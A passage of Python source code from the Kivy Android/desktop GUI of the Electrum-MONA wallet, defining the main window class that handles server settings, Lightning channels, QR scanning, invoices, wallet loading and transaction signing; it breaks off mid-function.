from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_mona.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register(
'Roboto',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
)
from electrum_mona.util import (NoDynamicFeeEstimates, NotEnoughFunds,
BITCOIN_BIP21_URI_SCHEME, LIGHTNING_URI_SCHEME,
UserFacingException)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog, SwapDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum_mona.simple_config import SimpleConfig
from electrum_mona.plugin import Plugins
from electrum_mona.paymentrequest import PaymentRequest
class ElectrumWindow(App, Logger):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = PREFERRED_NETWORK_PROTOCOL
def cb2(server_str):
popup.ids.server_str.text = server_str
servers = self.network.get_servers()
server_choices = {}
for _host, d in sorted(servers.items()):
port = d.get(protocol)
if port:
server = ServerAddr(_host, port, protocol=protocol)
server_choices[server.net_addr_str()] = _host
ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
if not server: raise Exception("failed to parse")
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, False)
use_gossip = BooleanProperty(False)
def on_use_gossip(self, instance, x):
self.electrum_config.set_key('use_gossip', self.use_gossip, True)
if self.use_gossip:
self.network.start_gossip()
else:
self.network.run_from_another_thread(
self.network.stop_gossip())
android_backups = BooleanProperty(False)
def on_android_backups(self, instance, x):
self.electrum_config.set_key('android_backups', self.android_backups, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def switch_to_send_screen(func):
# try until send_screen is available
def wrapper(self, *args):
f = lambda dt: (bool(func(self, *args) and False) if self.send_screen else bool(self.switch_to('send') or True)) if self.wallet else True
Clock.schedule_interval(f, 0.1)
return wrapper
@switch_to_send_screen
def set_URI(self, uri):
self.send_screen.set_URI(uri)
@switch_to_send_screen
def set_ln_invoice(self, invoice):
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = str(intent.getDataString())
scheme = str(intent.getScheme()).lower()
if scheme == BITCOIN_BIP21_URI_SCHEME:
self.set_URI(data)
elif scheme == LIGHTNING_URI_SCHEME:
self.set_ln_invoice(data)
def on_language(self, instance, language):
self.logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
self.logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
self.logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, wallet, key, status):
req = self.wallet.receive_requests.get(key)
if req is None:
return
if self.receive_screen:
if status == PR_PAID:
self.receive_screen.update()
else:
self.receive_screen.update_item(key, req)
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, wallet, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = self.wallet.get_invoice_status(req)
if self.send_screen:
if status == PR_PAID:
self.send_screen.update()
else:
self.send_screen.update_item(key, req)
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, wallet, key):
description = self.wallet.get_label(key)
self.show_info(_('Payment succeeded') + '\n\n' + description)
self._trigger_update_history()
def on_payment_failed(self, event, wallet, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
return self.electrum_config.get_base_unit()
def _set_bu(self, value):
self.electrum_config.set_base_unit(value)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return self.electrum_config.get_decimal_point()
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, decimal_point=self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
self._use_single_password = False
App.__init__(self)#, **kwargs)
Logger.__init__(self)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', False)
self.android_backups = config.get('android_backups', False)
self.use_gossip = config.get('use_gossip', False)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.set_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum_mona.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.set_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum_mona.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for name in ['send', 'history', 'receive']:
self.update_tab(name)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
self.request_popup = RequestDialog('Request', key)
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = invoice.invoice if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None, help_text=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(
title, data, show_text,
failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard,
help_text=help_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return self.scan_qr_non_android(on_complete)
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def scan_qr_non_android(self, on_complete):
from electrum_mona import qrscanner
try:
video_dev = self.electrum_config.get_video_device()
data = qrscanner.scan_barcode(video_dev)
on_complete(data)
except UserFacingException as e:
self.show_error(e)
except BaseException as e:
self.logger.exception('camera error')
self.show_error(repr(e))
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file(KIVY_GUI_PATH + '/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
self.logger.exception('crash on startup')
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
self.logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for monacoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_channels, ['channels_updated'])
util.register_callback(self.on_channel, ['channel'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_channel_db, ['channel_db'])
util.register_callback(self.set_num_peers, ['gossip_peers'])
util.register_callback(self.set_unknown_channels, ['unknown_channels'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_success(self, storage, db, password):
self.password = password
if self.electrum_config.get('single_password'):
self._use_single_password = check_password_for_directory(self.electrum_config, password)
self.logger.info(f'use single password: {self._use_single_password}')
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
def on_wizard_aborted(self):
# wizard did not return a wallet; and there is no wallet open atm
if not self.wallet:
self.stop()
def load_wallet_by_name(self, path):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
if self.password and self._use_single_password:
storage = WalletStorage(path)
# call check_password to decrypt
storage.check_password(self.password)
self.on_open_wallet(self.password, storage)
return
d = OpenWalletDialog(self, path, self.on_open_wallet)
d.open()
def on_open_wallet(self, password, storage):
if not storage.file_exists():
wizard = InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.run('new')
else:
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
assert not db.requires_upgrade()
self.on_wizard_success(storage, db, password)
def on_stop(self):
self.logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
if not self.wallet.has_lightning():
self.show_error(_('Lightning is not enabled for this wallet'))
return
if not self.wallet.lnworker.channels:
warning1 = _("Lightning support in Electrum is experimental. "
"Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable "
"from your seed. You must backup your wallet file everytime "
"you create a new channel.")
d = Question(_('Do you want to create your first channel?') +
'\n\n' + warning1 + '\n\n' + warning2, self.open_channel_dialog_with_warning)
d.open()
else:
d = LightningOpenChannelDialog(self)
d.open()
def swap_dialog(self):
d = SwapDialog(self, self.electrum_config)
d.open()
def open_channel_dialog_with_warning(self, b):
if b:
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, wallet, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def is_wallet_creation_disabled(self):
return bool(self.electrum_config.get('single_password')) and self.password is None
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
dirname = os.path.dirname(self.electrum_config.get_wallet_path())
d = WalletDialog(dirname, self.load_wallet_by_name, self.is_wallet_creation_disabled())
d.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name == 'lightning_channels_dialog' and not self.wallet.can_have_lightning():
self.show_error(_("Not available for this wallet.") + "\n\n" +
_("Lightning is currently restricted to HD wallets with p2wpkh addresses."))
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_mona.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_mona.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.send_screen = None
self.receive_screen = None
self.icon = os.path.dirname(KIVY_GUI_PATH) + "/icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
self.logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
self.request_focus_for_main_view()
def request_focus_for_main_view(self):
if platform != 'android':
return
# The main view of the activity might be not have focus
# in which case e.g. the OS "back" button would not work.
# see #6276 (specifically "method 2" and "method 3")
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
PythonActivity.requestFocusForMainView()
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
balance_sat = c + u + x + l
text = self.format_amount(balance_sat)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(balance_sat) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum_mona.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, decimal_point=self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(
x,
num_zeros=0,
decimal_point=self.decimal_point(),
is_diff=is_diff,
whitespaces=whitespaces,
)
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if x == '!':
return 'max'
return format_satoshis_plain(x, decimal_point=self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum-MONA', message,
app_icon=icon, app_name='Electrum-MONA')
except ImportError:
self.logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60:
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=None,
on_failure=self.stop)
d.open()
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, *, show_text_with_qr: bool = True):
if not label.data:
return
self.qr_dialog(label.name, label.data, show_text_with_qr)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon=f'atlas://{KIVY_GUI_PATH}/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon=f'atlas://{KIVY_GUI_PATH}/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = f'atlas://{KIVY_GUI_PATH}/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if not tx and self.wallet.lnworker:
tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def lightning_tx_dialog(self, tx):
from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
